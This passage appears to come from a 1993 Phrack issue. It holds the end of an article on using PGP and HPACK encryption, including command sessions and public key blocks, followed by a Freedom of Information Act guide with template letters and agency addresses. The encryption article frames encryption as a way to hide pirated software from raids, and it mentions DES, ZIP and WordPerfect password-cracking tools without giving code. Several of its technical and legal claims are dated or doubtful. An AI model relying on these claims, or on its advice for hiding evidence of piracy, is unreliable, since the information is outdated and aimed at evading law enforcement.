- program doesn't echo the password to your screen, a typical encryption program
- could provide reasonable security to your machine. How reasonable?
-
- If you have 9 pirated programs installed on your computer at a given
- time and you were raided by some law enforcement holes, you would not be
- labeled at a felon. Instead, it wouldn't even be worth their time to even raid
- you. If you have 9 pirated programs installed on your computer, had 200
- pirated programs encrypted in a disk box, and you were raided, you would have
- to be charged with possession of 9 pirated programs (unless you did something
- stupid, like write "Pirated Ultima" or something on the label).
-
- We all suspected encryption was the right thing to do, but what about
- encryption itself? How secure IS encryption?
-
- If you think that the world of the Hackers is deeply shrouded with
- extreme prejudice, I bet you can't wait to talk with crypto-analysts. These
- people are traditionally the biggest bunch of holes I've ever laid eyes on. In
- their mind, people have been debating the concepts of encryption since the dawn
- of time, and if you come up with a totally new method of data encryption, -YOU
- ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying "Oh, I
- just came up with this idea for an encryption which might be the best one yet"
- when people have dedicated all their lives to designing and breaking encryption
- techniques -- so what makes you think you're so fucking bright?
-
- Anyway, crypto-(anal)ysts tend to take most comments as veiled insults,
- and are easily terribly offended. Well, make no mistake, if I wanted to insult
- these people, I'd do it. I've already done it. I'll continue to do it. And I
- won't thinly veil it with good manners, either.
-
- The field of Crypto-analysis has traditionally had a mathematical
- emphasis. The Beal Cipher and the German Enigma Cipher are some of the more
- popular views of the field. Ever since World War 2, people have spent time
- researching how technology was going to affect the future of data encryption.
-
- If the United States went to war with some other country, they'd have a
- strong advantage if they knew the orders of the opposing side before they were
- carried out. Using spies and wire taps, they can gain encrypted data referred
- to as Ciphertext. They hand the information over to groups that deal with
- encryption such as the NSA and the CIA, and they attempt to decode the
- information before the encrypted information is too old to be of any use.
-
- The future of Computer Criminology rests in the same ways. The
- deadline on white collar crimes is defaulted to about 3-4 years, which is
- called the Statute of Limitations. Once a file is obtained which is encrypted,
- it becomes a task to decrypt it within the statute's time.
-
- As most crypto-analysts would agree, the cost in man-hours as well as
- supercomputer time would make it unfeasible to enforce brute force decryption
- techniques of random encryption methods. As a result of this, government
- regulation stepped in.
-
- The National Security Agency (referred to as "Spooks" by the relatively
- famous tormenter of KGB-paid-off hackers, Cliff Stoll, which is probably the
- only thing he's ever said which makes me think he could be a real human being)
- released the DES -- Data Encryption Standard. This encryption method was
- basically solid and took a long time to crack, which was also the Catch-22.
-
- DES wasn't uncrackable, it was just that it took "an unreasonable
- length of time to crack." The attack against the word "unreasonable" keeps
- getting stronger and stronger. While DES originated on Honeywell and DEC PDPs,
- it was rumored that they'd networked enough computers together to break a
- typical DES encrypted file. Now that we have better computers and the cost
- requirements for high-speed workstations are even less, I believe that even if
- they overestimated "unreasonable" a hundredfold, they'd be in the "reasonable"
- levels now.
-
- To explain how fast DES runs these days...
-
- I personally wrote a password cracker for DES which was arguably the
- very first true high-speed cracker. It used the German "Ultra-Fast Crypt"
- version of the DES algorithm, which happened to contain a static variable used
- to hold part of the previous attempt at encrypting the password, called the
- salt. By making sure the system wouldn't resalt on every password attempt, I
- was able to guess passwords out of a dictionary at the rate of 400+ words per
- second on a 386-25 (other methods at that time were going at about 30 per
- second). As I understand it now, levels at 500+ for the same CPU have been
- achieved.
-
- Now this means I can go through an entire dictionary in about five
- minutes on a DES-encrypted segment. The NSA has REAL cash and some of the
- finest mathematicians in the world, so if they wanted to gain some really
- decent speed on encryption, DES fits the ideal for parallel programming.
- Splitting a DES segment across a hundred CPUs, each relatively modern, they
- could crank out terraflops of speed. They'd probably be able to crack the code
- within a few days if they wanted to.
-
- Ten years from now, they could do it in a few seconds.
-
- Of course, the proper way to circumnavigate DES encryption is to locate
- and discover a more reliable, less popular method. Because the U.S. Government
- regulates it, it doesn't mean it's the best. In fact, it means it's the
- fucking lamest thing they could sweeten up and hope the public swallows it!
- The last attempt the NSA made at regulating a standard dealing with encryption,
- they got roasted.
-
- I'm somewhat convinced that the NSA is against personal security, and
- from all the press they give, they don't WANT anyone to have personal security.
- Neither does the Media for that matter.
-
- Because of lamers in the "Biblical Injustice Grievance Group of
- Opposing Terrible Sacrilege" (or BIGGOTS) who think that if you violate a LAW
- you're going to Hell (see APPENDIX C for my viewpoint of these people) and who
- will have convinced Congress to pass ease-of-use wire taps on telephone lines
- and networks so that they can monitor casual connections without search
- warrants, encryption will be mandatory if you want any privacy at all.
-
- And to quote Phil Zimmermann, "If privacy is outlawed, only the
- outlaws will have privacy."
-
- Therefore, encryption methods that we must use should be gathered into
- very solid categories which do NOT have endorsement of the NSA and also have
- usefulness in technique.
-
- HOW TO USE DECENT ENCRYPTION:
-
- (First, go to APPENDIX D, and get yourself a copy of PGP, latest version.)
-
- First of all, PGP is contraband software, presumably illegal to use in
- the United States because of a patent infringement it allegedly carries. The
- patent infringement is the usage of a variant of the RSA encryption algorithm.
- Can you patent an algorithm? By definition, you cannot patent an idea, just a
- product -- like source code. Yet, the patent exists to be true until proven
- false. More examples of how people in the crypto-analyst field can be assholes.
-
- Anyway, Phil's Pretty Good Software, creators of PGP, were sued and all
- rights to PGP were forfeited in the United States of America. Here comes the
- violation of the SECOND law, illegal exportation of a data encryption outside
- of the United States of America. Phil distributed his encryption techniques
- outside the USA, which is against the law as well. Even though Mr. Zimmermann
- doesn't do any work with PGP, because he freely gave his source code to others,
- people in countries besides the United States are constantly updating and
- improving the PGP package.
-
- PGP handles two very important methods of encryption -- conventional
- and public key. These are both very important to understand because they
- protect against completely different things.
-
- -----------------------
- CONVENTIONAL ENCRYPTION
- -----------------------
-
- Conventional encryption techniques are easiest to understand. You
- supply a password and the password you enter encrypts a file or some other sort
- of data. By re-entering the password, it allows you to recreate the original
- data.
-
- Simple enough concept, just don't give the password to someone you
- don't trust. If you give the password to the wrong person, your whole business
- is in jeopardy. Of course, that goes with just about anything you consider
- important.
-
- There are doubtlessly many "secure enough" ciphers which exist right
- now. Unfortunately, the availability of these methods are somewhat slim
- because of exportation laws. The "major" encryption programs which I believe
- are worth talking about here are maintained by people foreign to the USA.
-
- The two methods of "conventional" encryption are at least not DES,
- which qualifies them as okay in my book. This doesn't mean they are impossible
- to break, but they don't have certain DES limitations which I know exist, such
- as 8 character password maximum. The methods are: MDC, as available in the
- package HPACK; and IDEA, as available in Pretty Good Privacy.
-
- Once you've installed PGP, we can start by practicing encrypting
- some typical files on your PC. To conventionally encrypt your AUTOEXEC.BAT
- file (it won't delete the file after encryption), use the following command:
-
- C:\> pgp -c autoexec.bat
- Pretty Good Privacy 2.1 - Public-key encryption for the masses.
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/19 03:06 GMT
-
- You need a pass phrase to encrypt the file.
- Enter pass phrase: { Password not echoed }
- Enter same pass phrase again: Just a moment....
- Ciphertext file: autoexec.pgp
-
- C:\> dir
-
- Volume in drive C is RACK'S
- Directory of c:\autoexec.pgp
-
- autoexec.pgp 330 1-18-93 21:05
-
- 330 bytes in 1 file(s) 8,192 bytes allocated
- 52,527,104 bytes free
-
- PGP will compress the file before encrypting it. I'd say this is a
- vulnerability to the encryption on the basis that the file contains a ZIP file
- signature which could conceivably make the overall encryption less secure.
- Although no reports have been made of someone breaking PGP this way, I'd feel
- more comfortable with the ZIP features turned off. This is somewhat contrary
- to the fact that redundancy checking is another way of breaking ciphertext.
- However, it isn't as reliable as checking a ZIP signature.
-
- Although PGP will doubtlessly become the more popular of the two
- programs, HPACK's encryption "strength" is that by being less popular, it will
- probably not be as heavily researched as PGP's methods will be. Of course, by
- following PGP, new methods of encryption will doubtlessly be added as the
- program is improved.
-
- Here is how you'd go about encrypting an entire file using the HPACK
- program using the MDC "conventional" encryption:
-
- C:\> hpack A -C secret.hpk secret.txt
- HPACK - The multi-system archiver Version 0.78a0 (shareware version)
- For Amiga, Archimedes, Macintosh, MSDOS, OS/2, and UNIX
- Copyright (c) Peter Gutmann 1989 - 1992. Release date: 1 Sept 1992
-
- Archive is 'SECRET.HPK'
-
- Please enter password (8..80 characters):
- Reenter password to confirm:
- Adding SECRET .TXT
-
- Done
-
- Anyway, I don't personally think HPACK will ever become truly popular
- for any reason besides its encryption capabilities. ZIP has been ported to an
- amazing number of platforms, in which lies ZIP's encryption weakness. If you
- think ZIP is safe, remember that you need to prevent the possibility of four
- years of attempted password cracking in order to beat the Statutes of
- Limitations:
-
- Here is the introduction to ZIPCRACK, and what it had to say about how
- easy it is to break through this barrier:
-
- (Taken from ZIPCRACK.DOC)
- -----
- ZIPCRACK is a program designed to demonstrate how easy it is to find
- passwords on files created with PKZIP. The approach used is a fast,
- brute-force attack, capable of scanning thousands of passwords per second
- (5-6000 on an 80386-33). While there is currently no known way to decrypt
- PKZIP's files without first locating the correct password, the probability that
- a particular ZIP's password can be found in a billion-word search (which takes
- about a day on a fast '486) is high enough that anyone using the encryption
- included in PKZIP 1.10 should be cautious (note: as of this writing, PKZIP
- version 2.00 has not been released, so it is not yet known whether future
- versions of PKZIP will use an improved encryption algorithm). The author's
- primary purpose in releasing this program is to encourage improvements in ZIP
- security. The intended goal is NOT to make it easy for every computer user to
- break into any ZIP, so no effort has been made to make the program
- user-friendly.
- ----- End Blurb
-
- Likewise, WordPerfect is even more vulnerable. I've caught a copy of
- WordPerfect Crack out on the Internet and here is what it has to say about
- WordPerfect's impossible-to-break methods:
-
- (Taken from WPCRACK.DOC:)
- -----
- WordPerfect's manual claims that "You can protect or lock your documents with a
- password so that no one will be able to retrieve or print the file without
- knowing the password - not even you," and "If you forget the password, there is
- absolutely no way to retrieve the document." [1]
-
- Pretty impressive! Actually, you could crack the password of a Word Perfect
- 5.x file on a 8 1/2" x 11" sheet of paper, it's so simple. If you are counting
- on your files being safe, they are NOT. Bennet [2] originally discovered how
- the file was encrypted, and Bergen and Caelli [3] determined further
- information regarding version 5.x. I have taken these papers, extended them,
- and written some programs to extract the password from the file.
- ----- End Blurb
-
- ---------------------
- PUBLIC KEY ENCRYPTION
- ---------------------
-
- Back to the Masters of Deception analogy -- they were telephone
- tapped. Conventional encryption is good for home use, because only one person
- could possibly know the password. But what happens when you want to transmit
- the encrypted data by telephone? If the Secret Service is listening in on your
- phone calls, you can't tell the password to the person that you want to send
- the encrypted information to. The SS will grab the password every single time.
-
- Enter Public-Key encryption! The concepts behind Public-Key are very
- in-depth compared to conventional encryption. The idea here is that passwords
- are not exchanged; instead a "key" which tells HOW to encrypt the file for the
- other person is given to them. This is called the Public Key.
-
- You retain the PRIVATE key and the PASSWORD. They tell you how to
- decrypt the file that someone sent you. There is no "straight" path between
- the Public Key and the Private Key, so just because someone HAS the public key,
- it doesn't mean they can produce either your Secret Key or Password. All it
- means is that if they encrypt the file using the Public Key, you will be able
- to decrypt it. Furthermore, because of one-way encryption methods, the output
- your Public Key produces is original each time, and therefore, you can't
- decrypt the information you encrypted with the Public Key -- even if you
- encrypted it yourself!
-
- Therefore, you can freely give out your own Public Key to anyone you
- want, and any information you receive, tapped or not, won't make a difference.
- As a result, you can trade anything you want and not worry about telephone
- taps! This technique supposedly is being used to defend the United States'
- Nuclear Arsenal, if you disbelieve this is secure.
-
- I've actually talked with some of the makers of the RSA "Public-Key"
- algorithm, and, albeit they are quite brilliant individuals, I'm somewhat
- miffed at their lack of enthusiasm for aiding the public in getting a hold of
- tools to use Public Key. As a result, they are about to get railroaded by
- people choosing to use PGP in preference to squat.
-
- Okay, maybe they don't have "squat" available. In fact, they have a
- totally free package with source code available to the USA public (no
- exportation of code) which people can use called RSAREF. Appendix E explains
- more about why I'm not suggesting you use this package, and also how to obtain
- it so you can see for yourself.
-
- Now that we know the basic concepts of Public-Key, let's go ahead and
- create the basics for effective tap-proof communications.
-
- Generation of your own secret key (comments in {}s):
-
- C:\> pgp -kg { Command used to activate PGP for key generation }
- Pretty Good Privacy 2.1 - Public-key encryption for the masses.
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/18 19:53 GMT
-
- Pick your RSA key size:
- 1) 384 bits- Casual grade, fast but less secure
- 2) 512 bits- Commercial grade, medium speed, good security
- 3) 1024 bits- Military grade, very slow, highest security
- Choose 1, 2, or 3, or enter desired number of bits: 3 {DAMN STRAIGHT MILITARY}
-
- Generating an RSA key with a 1024-bit modulus...
- You need a user ID for your public key. The desired form for this
- user ID is your name, followed by your E-mail address enclosed in
- <angle brackets>, if you have an E-mail address.
- For example: John Q. Smith <12345.6789@compuserve.com>
-
- Enter a user ID for your public key:
- The Racketeer <rack@lycaeum.hfc.com>
-
- You need a pass phrase to protect your RSA secret key.
- Your pass phrase can be any sentence or phrase and may have many
- words, spaces, punctuation, or any other printable characters.
- Enter pass phrase: { Not echoed to screen }
- Enter same pass phrase again: { " " " " }
- Note that key generation is a VERY lengthy process.
-
- We need to generate 105 random bytes. This is done by measuring the
- time intervals between your keystrokes. Please enter some text on your
- keyboard, at least 210 nonrepeating keystrokes, until you hear the beep:
- 1 .* { decrements }
- -Enough, thank you.
- ...................................................++++ ........++++
- Key generation completed.
-
- It took a 33-386DX a grand total of about 10 minutes to make the key.
- Now that it has been generated, it has been placed in your key ring. We can
- examine the key ring using the following command:
-
- C:\> pgp -kv
- Pretty Good Privacy 2.1 - Public-key encryption for the masses.
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/18 20:19 GMT
-
- Key ring: 'c:\pgp\pubring.pgp'
- Type bits/keyID Date User ID
- pub 1024/7C8C3D 1993/01/18 The Racketeer <rack@lycaeum.hfc.com>
- 1 key(s) examined.
-
- We've now got a viable keyring with your own keys. Now, you need to
- extract your Public Key so that you can have other people encrypt shit and have
- it sent to you. In order to do this, you need to be able to mail it to them.
- Therefore, you need to extract it in ASCII format. This is done by the
- following:
-
- C:\> pgp -kxa "The Racketeer <rack@lycaeum.hfc.com>"
- Pretty Good Privacy 2.1 - Public-key encryption for the masses
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/18 20:56 GMT
-
- Extracting from key ring: 'c:\pgp\pubring.pgp', userid "The Racketeer
- <rack@lycaeum.hfc.com>".
-
- Key for user ID: The Racketeer <rack@lycaeum.hfc.com>
- 1024-bit key, Key ID 0C975F, created 1993/01/18
-
- Extract the above key into which file? rackkey
-
- Transport armor file: rackkey.asc
-
- Key extracted to file 'rackkey.asc'.
-
- Done. The end result of the key is a file which contains:
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.1
-
- mQCNAisuyi4AAAEEAN+cY6nUU+VIhYOqBfcc12rEMph+A7iadUi8xQJ00ANvp/iF
- +ugZ+GP2ZnzA0fob9cG/MVbh+iiz3g+nbS+ZljD2uK4VyxZfu5alsbCBFbJ6Oa8K
- /c/e19lzaksSlTcqTMQEae60JUkrHWpnxQMM3IqSnh3D+SbsmLBs4pFrfIw9AAUR
- tCRUaGUgUmFja2V0ZWVyIDxyYWNrQGx5Y2FldW0uaGZjLmNvbT4=
- =6rFE
- -----END PGP PUBLIC KEY BLOCK-----
-
- This can be tagged to the bottom of whatever E-Mail message you want to
- send or whatever. This key can added to someone else's public key ring and
- thereby used to encrypt information so that it can be sent to you. Most people
- who use this on USENET add it onto their signature files so that it is
- automatically posted on their messages.
-
- Let's assume someone else wanted to communicate with you. As a result,
- they sent you their own Public Key:
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.1
-
- mQA9AitgcOsAAAEBgMlGLWl8rub0Ulzv3wpxI5OFLRkx3UcGCGsi/y/Qg7nR8dwI
- owUy65l9XZsp0MUnFQAFEbQlT25lIER1bWIgUHVkIDwxRHVtUHVkQG1haWxydXMu
- Yml0bmV0Pg==
- =FZBm
- -----END PGP PUBLIC KEY BLOCK-----
-
- Notice this guy, Mr. One Dumb Pud, used a smaller key size than you
- did. This shouldn't make any difference because PGP detects this
- automatically. Let's now add the schlep onto your key ring.
-
- C:\> pgp -ka dumbpud.asc
- Pretty Good Privacy 2.1 - Public-key encryption for the masses.
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/22 22:17 GMT
-
- Key ring: 'c:\pgp\pubring.$01'
- Type bits/keyID Date User ID
- pub 384/C52715 1993/01/22 One Dumb Pud <1DumPud@mailrus.bitnet>
-
- New key ID: C52715
-
- Keyfile contains:
- 1 new key(s)
- Adding key ID C52715 from file 'dumbpud.asc' to key ring 'c:\pgp\pubring.pgp'.
-
- Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
- 384-bit key, Key ID C52715, crated 1993/01/22
- This key/userID associate is not certified.
-
- Do you want to certify this key yourself (y/N)? n {We'll deal with this later}
-
- Okay, now we have the guy on our key ring. Let's go ahead and encrypt
- a file for the guy. How about having the honor of an unedited copy of this
- file?
-
- C:\> pgp -e encrypt One {PGP has automatic name completion}
- Pretty Good Privacy 2.1 - Public-key encryption for the masses.
- (c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
- Date: 1993/01/22 22:24 GMT
-
-
- Recipient's public key will be used to encrypt.
- Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
- 384-bit key, Key ID C52715, created 1993/01/22
-
- WARNING: Because this public key is not certified with a trusted
- signature, it is not known with high confidence that this public key
- actually belongs to: "One Dumb Pud <1DumPud@mailrus.bitnet>".
-
- Are you sure you want to use this public key (y/N)? y
- ------------------------------------------------------------------------------
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 12 of 14
-
-
- %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
- | The Freedom of Information Act and You |
- | |
- | by |
- | Vince Niel |
- | |
- %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
-
-
- As we all know of our United State government in the modern era, Big
- Brother is watching. It is naive to think that we do not live in a world
- similar to the one described is George Orwell's novel, 1984. The government
- keeps tabs on everything we do. The federal government has thousands of
- documents concerning individual citizens. For example:
-
- If you have worked for a federal agency or government contractor or have been
- a member of any branch of the armed services, the federal government has a
- file on you.
-
- If you have participated in any federally financed project, some agency
- probably has a record of it.
-
- If you have been arrested by local, state or federal authorities and your
- fingerprints were taken, the FBI maintains a record of you and that arrest.
-
- If you have applied for or received a student loan or grant certified by the
- government, the Department of Health, Education, and Welfare has recorded the
- information.
-
- If you have applied for or been investigated for a security clearance for any
- reason, the Department of Defense has a record of you.
-
- And these records are not just records of application. Take for example
- the FBI. Once you commit a crime, they are watching you. They update your
- file every time there is a major occurrence in your life i.e. marriage,
- hospitalization, joining the military, committing another crime, etc. If they
- find the least likelihood of suspicion, they investigate you in depth to add
- even more to your file. People do not even realize how large their FBI file
- is.
-
- If you were ever on a pirate board that got busted, and you had your info
- on there, all the users' info on the bulletin board is transferred to the
- federal government. There a file is opened up for each individual user. And
- if you ever get in trouble with the law, that file will be opened up and used
- against you if necessary. Before I continue, I would like to site an example
- of a man who ordered his file from the army. This file was created when he
- applied for a security clearance with the military years before. In it said:
-
- ... He owed 50 cents to his high school for not returning his locker key.
- ... He dated 2 or 3 times a week, and was not intimate with his dates.
- ... He was irresponsible because he owed a $5 jaywalking ticket in Seattle.
-
- So what can you do about this big bureaucratic machine we call our
- government? Simple, fight back! The Freedom of Information Act (FOIA as it
- will be referred to) was passed and allows you to obtain your personal records
- from any governmental agency. A typeup of most of the agencies plus the
- actual act can be found at the end of this file.
-
- There are restrictions to the act, but it can be quite useful to any
- individual who has had run-ins with the law or who just wants to know what the
- federal government has on him. You can even go to court against the
- government if a document is denied to you and you think you deserve to see it.
- The act is not widely know, and for good reason. The government doesn't want
- you to know what they are doing. But alas, the information will be set free,
- the people have a right to know!
-
- And don't think that the only interesting documents are the ones from the
- FBI and CIA. Fascinating documents can be gotten from the IRS, Department of
- Health, Department of Schools, Federal Traffic Administration, HUD, National
- Credit Union, with information you will never believe people who actually
- store about you.
-
-
- The Specifics of Asking For Your Personal File From a Particular Agency
- -----------------------------------------------------------------------
-
- First of all, I would like to bring up a major misconception people make.
- Most people assume that if you ask for your file from the FBI, and there isn't
- a file on you, one will be created for you. That is an untrue and extremely
- paranoid statement. The government has better things to do then open up files
- on curious citizens. And even if by some remote chance they do open up a file
- for you, who cares? They have a files on millions of people, its not like it
- will hinder you in life. Just be careful out there, that is all I can say.
-
- The most important thing that can be done when asking for information from
- a governmental agency under the FOIA is to make it as brief, concise, and
- specific as possible. In this way, you will get your information, or refusal
- as soon as possible, and you will also curb copying fees (which will be
- discussed later). First you have to find the agency that concerns you. If
- you are not sure which agency to apply to, send your letter to more than one.
- There will be a list of agencies at the end of this file, but a complete list
- of agencies can be found in the United States Government Manual. This can be
- found at any library.
-
- The request should be addressed to the agency's FOIA officer or to the
- head of the specific agency. Most agencies have a secretary to deal with all
- the FOIA applications. The smaller agencies, which you probably will not be
- concerned with, might not have an officer. On the bottom left hand corner of
- the envelope "Freedom of Information Act Request" should be printed legibly.
- This guarantees that your letter won't get caught in the paperwork shuffle.
-
- All agencies has FOIA regulation that you should look at. They do not
- want to send out 'sensitive' documents and whatnot. These regulations also
- describe the request process in detail. Here you can also find out what
- specific document you are looking for, reducing fees from the agency. These
- regulations can be found in "The Code of Federal Regulations", which can also
- be found at your local library.
-
- Most agencies require that you get your letter 'notarized' or they won't
- even look at it. This prevents you from impersonating someone else and
- getting their file. To get your letter notarized, all you have to do is go to
- your local bank. Show some proof that the person signing the letter is you
- (with an id or something) and they will notarize it. Now the government has
- no excuse for not taking your letter.
- There are four parts to an FOIA request letter:
-
- 1) Request being made under the FOIA.
- 2) Records that are sought, as specifically as possible.
- 3) Name and address of the person requesting the information. Telephone
- number is not necessary, but you will find out about the outcome of
- your request much quicker.
- 4) How much money you are willing to spend for the document (explained
- later).
-
- Here is a sample letter, just fill in your information:
-
- -----------------------------------------------------------------------------
-
- Agency Head [or Freedom of Information Act Officer]
- Name of Agency
- Address of Agency
- City, State, Zip Code
-
- Re: Freedom of Information Act Request
-
- I request a copy of the following documents [or documents containing the
- following information if you do not know the specific name of the document] be
- provided for me: [identify the documents as accurately as possible]
-
- In order to help determine my status to assess fees, you should know that
- I am an individual seeking information for personal use and not for commercial
- use. [always, always say you are an individual. That way, you will not have
- to pay extra fees because you are part of the media or a commercial endeavor.]
-
- [Optional] I am willing to pay fees for this request up to a maximum of
- $__. If you estimate the fees will exceed this limit, please inform me first.
-
- [Optional] I request a waiver of all fees for this request. Disclosure of
- the requested information to me is in the public interest because it is likely
- to contribute significantly to public understanding of the operations or
- activities of the government and is not primarily in my commercial interest
- [include specific information].
-
- Thank you for your consideration of this request.
-
- Sincerely,
-
- Name
- Address
- City, State, Zip Code
- Telephone Number [Optional]
- -----------------------------------------------------------------------------
-
- Some of the things in the letter may not be understood at first, but I will
- get to them.
-
-
- Money:
-
- As you might have guessed, getting information under the FOIA is not free,
- but it can be cheapened if you play your cards right. As specified in the
- letter, always say that you are an individual seeking information not for
- commercial purposes. Review is the process of going through documents and
- checking if they can be sent to you or not. Under the law, if you are a
- private individual and are not requesting information for commercial purposes,
- you cannot be charged with review fees!
-
- All agencies have set fees for copying a document. Fees can also be taken
- for searching for a document. If you are an individual, you will be charged
- the least amount of money. Of course, if you have no idea in hell what the
- name of the document is, and you are stabbing in the dark it is a good idea to
- write in a set amount you are willing to spend. When the amount is reached,
- you will be notified. This is in the letter above.
-
- You don't want to be jacked for a bill of 150 bucks if you send them a
- letter 'just send me everything you got on me'. Even if you have no idea what
- they have, you can say 'please send me all the dossiers, legal documents, and
- records you have under my name'. Remember, the government likes bureaucratic
- bullshit. If you do not phrase you letter right, they will nail you on it. A
- lot of agencies will waive the cost of processing if it is under $3, and even
- if you receive a bill, it should not exceed 5-10 dollars.
-
- If you can somehow prove that by accessing this information, it will help
- the general public understand how the government works, you can waive the fee
- altogether. If through some form of shrewd doublespeak you can think of
- something clever to satisfy this obligation, you can then request huge amounts
- of documents, without paying a cent for them.
-
- Restrictions:
-
- Of course, there are restrictions to the Freedom of Information Act. Some
- documentation may be said to be sensitive and out of reach of the public eye.
- Any refusal to grant information through the FOIA may be taken to court, and
- won. In the act, it states that cases brought up because of the FOIA should
- be put first on the court docket and tried as soon as possible. Its always
- worth a try.
-
- When a record contains some information that is withheld, it does not
- necessarily mean that the whole record is exempt. The federal agency is
- obliged to cut out the portion that is sensitive, and send you the portion it
- can disclose. The agency must also give you a reason why it cut out this
- portion of the document.
-
- Here are a few of the reasons for exemption:
-
- 1) Classified Documents - Classified Documents may be withheld. The documents
- may be classified in the interest of national defense and foreign policy.
- Classified documents may still be requested. The agency will review the
- document to determine whether it still needs protection. If a requested
- document is already declassified, it can be easily requested.
-
- 2) Internal Personal Rules and Practices - This exemption covers matters
- related to an agency's internal rules and practices. Requests for Internal
- schedules, administrative manuals and the like can be refused.
-
- 3) Confidential Business Information - Trade secrets or commercially valuable
- plans do not have to be released. Commercial or financial information does
- not also have to be released, as it might hurt an individual.
-
- 4) Personal Privacy - This covers personnel, medical, and similar files of
- which disclosed would interfere with personal privacy. This exemption has
- importance because it prevents a commercial business from getting
- information about you. At the same time, it allows you to get private
- information stored about yourself. This is why it is important to get your
- letter notarized.
-
- 5) Law Enforcement - This allows law enforcement agencies to withhold law
- enforcement records in order to protect themselves and others. If there is
- a trial going on, you can't request your file. Its smart to get your file
- from the feds now, while you still can. Don't wait until you get in some
- serious shit, and then you don't even know what they have on you! If you
- know what they have on you, you know how to fight back.
-
- If you request does get refused, there is still hope. If you think that
- under the FOIA's legal terms you deserve to have the document, you can send a
- letter of appeal. This letter can also be used to argue that their processing
- charge was unfair. The appeal letter is shown below:
-
- ------------------------------------------------------------------------------
-
- Agency Head or Appeal Officer
- Name of Agency
- Address of Agency
- City, State, Zip Code
-
- Re: Freedom of Information Act Appeal
-
- Dear:
- This is an appeal under the Freedom of Information Act.
-
- On (date), I requested documents under the Freedom of Information Act. My
- request was assigned the following identification number: ______. On (date),
- I received a response to my request in a letter signed by (name of official).
- I appeal the denial of my request.
-
- [Optional] The documents that were withheld must be disclosed under the
- FOIA because...
-
- [Optional] I appeal the decision to deny my request for a waiver of fees.
- I believe that I am entitles to a waiver of fees. Disclosure of the documents
- I requested is in the public interest because the information is likely to
- contribute significantly to public understanding of the operations or
- activities of government and is not primarily in my commercial interest.
- (Provide Details)
-
- [Optional] I appeal the decision to require me to pay review costs for
- this request. I am not seeking this document for commercial use. (Provide
- Details)
-
-
- Thank you for your consideration of this appeal.
-
- Sincerely,
-
- Name
- Address
- City, State, Zip Code
- Telephone Number [Optional]
- ------------------------------------------------------------------------------
-
-
- Here is a listing of a few government agencies that hold records on individual
- citizens:
-
- Agriculture
- Department of Agriculture
- Washington, D.C. 20250
-
- Air Force
- Department of the Air Force
- The Pentagon
- Washington, D.C. 20330
-
- Alcohol, Drug Abuse, and Mental Health
- Alcohol, Drug Abuse, and Mental Health Administration
- 5600 Fisher Lane
- Rockville, Maryland 20857
-
- Alcohol, Tobacco and Firearms
- Bureau of Alcohol, Tobacco, and Firearms
- 1200 Pennsylvania Avenue, N.W.
- Washington, D.C. 20226
-
- American Battle Monuments
- American Battle Monuments Commission:
- 40014 Forrestal Bldg.
- Washington, D.C. 20314
-
- Appalachian Regional
- Appalachian Regional Commission:
- 1666 Connecticut Avenue, N.W.
- Washington, D.C. 20235
-
- Arms Control and Disarmament
- U.S. Army Control and Disarmament Agency
- 320 21st Street
- Washington, D.C. 20451
-
- Army
- Department of the Army
- The Pentagon
- Washington, D.C. 20314
-
- Census
- Bureau of the Census
- Federal Building 3
- Washington, D.C. 20233
-
- CIA
- Central Intelligence Agency
- Washington, D.C. 20505
-
- Civil Aeronautics
- Civil Aeronautics Board
- 1825 Connecticut Avenue, N.W.
- Washington, D.C. 20428
-
- Civil Rights
- Civil Rights Commission
- 1121 Vermont Avenue, N.W.
- Washington, D.C. 20425
-
- Civil Service
- Civil Service Commission
- 1900 E Street, N.W.
- Washington, D.C. 20415
-
-
- Coastal Plains
- Coastal Plains Regional Commission
- 1725 K Street, N.W.
- Washington, D.C. 20006
-
- Commerce
- Department of Commerce
- Washington, D.C. 20230
-
- Community Services
- Community Services Administration
- 1200 19th Street, N.W.
- Washington, D.C. 20506
-
- Consumer Product Safety
- Consumer Product Safety Commission
- 1111 18th Street, N.W.
- Washington, D.C. 20207
-
- Copyright Office
- Copyright Office
- Library of Congress
- Washington, D.C. 20559
-
- Customs Service
- U.S. Customs Service
- 1301 Constitution Avenue, N.W.
- Washington, D.C. 20229
-
- Defense
- Department of Defense
- The Pentagon
- Washington, D.C. 20301
-
- Defense Contracts Audits
- Defense Contracts Audits Agency
- Cameron Station
- Alexandria, Virginia 22314
-
- Defense Intelligence
- Defense Intelligence Agency
- RDS-3A
- Washington, D.C. 20301
-
- Defense Investigation
- Defense Investigative Services
- D0020
- Washington, D.C. 20304
-
- Defense Logistical
- Defense Logistical Agency
- Cameron Station
- Alexandria, Virginia, 22314
-
- Defense Mapping
- Defense Mapping Agency
- Naval Observatory
- Washington, D.C. 20305
-
- Disease Control
- Center for Disease Control
- Atlanta, Georgia 30333
-
- Economic Development
- Economic Development Administration
- Department of Commerce
- 14th & Constitution Avenue, N.W.
- Washington, D.C. 20230
-
- Education
- Office of Education
- 400 Maryland Avenue, S.W.
- Washington, D.C. 20202
-
- Energy
- Department of Energy
- U.S. Department of Energy
- Washington, D.C. 20461
- EPA
- Environmental Protection Agency
- 401 M Street, S.W.
- Washington, D.C. 20460
-
- Environmental Quality
- Council on Environmental Quality
- 722 Jackson Place, N.W.
- Washington, D.C. 20006
-
- Equal Employment Opportunity
- Equal Employment Opportunity Commission
- 2401 E Street, N.W.
- Washington, D.C. 20506
-
- Export-Import Bank
- Export-Import Bank of the U.S.
- 811 Vermont Avenue, N.W.
- Washington, D.C. 20571
